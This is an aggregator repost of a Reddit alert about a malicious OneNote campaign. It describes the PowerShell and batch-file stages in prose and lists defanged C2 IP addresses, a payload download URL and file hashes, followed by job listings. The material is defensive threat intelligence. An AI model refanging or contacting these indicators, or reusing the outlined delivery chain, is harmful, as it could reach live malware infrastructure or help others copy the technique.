all InfoSec news
Be aware of the new malicious OneNote campaign!
Nov. 3, 2023, 9:49 a.m. | /u/arieldavidpur
cybersecurity www.reddit.com
1. Powershell script - Creating a WebClient to access the C2 with Empire User-Agent and then getting the malicious payload encrypted with RC4.
2. Batch file - Creating an LNK file and running it with Wscript.Shell command and then drop a remote EXE file and execute it using conhost.exe
IOCs:
34\[.\]159\[.\]33\[.\]139 (Google Cloud)
167\[.\]235\[.\]247\[.\]158
hxxps://botfusion1-8f4913f37609\[.\]herokuapp\[.\]com/331736/voicemail4\[.\]ex\_
b297041a66ff6e4cd884a33e7600478f529bc88f6105e5a81bd9f177eaf18a5e
2944991319bdce514a8313db92f195200fc9568afba4059f5cc315aa0e9a6713
15F5CE97C44E17D9C094D0DE6C8CAB95331F485F352BC298F1561761FF1705C6
7670970292647266783fd0006663746e1d448043fc1c4aba0927c3afd9d331b0
4f9b3d45cf05f70371b9a27ae0af7fc1f75b8aad4dc9fa87f44988716e355c33
2be7bee6f5c5c8b6b54cedeef908154316a6f924a7c90f8b9c07cd26d68fbcca
\#onenote #malwareanalysis #malware #cybersecurity #emailsecurity #browsersecurity #websecurity #googlecloudplatform Microsoft #sliver …
access agent aware batch campaign command cybersecurity empire encrypted file lnk lnk file malicious onenote payload powershell powershell script rc4 running script shell user-agent
More from www.reddit.com / cybersecurity
Jobs in InfoSec / Cybersecurity
Social Engineer For Reverse Engineering Exploit Study
@ Independent study | Remote
Cloud Security Analyst
@ Cloud Peritus | Bengaluru, India
Cyber Program Manager - CISO- United States – Remote
@ Stanley Black & Decker | Towson MD USA - 701 E Joppa Rd Bg 700
Network Security Engineer (AEGIS)
@ Peraton | Virginia Beach, VA, United States
SC2022-002065 Cyber Security Incident Responder (NS) - MON 13 May
@ EMW, Inc. | Mons, Wallonia, Belgium
Information Systems Security Engineer
@ Booz Allen Hamilton | USA, GA, Warner Robins (300 Park Pl Dr)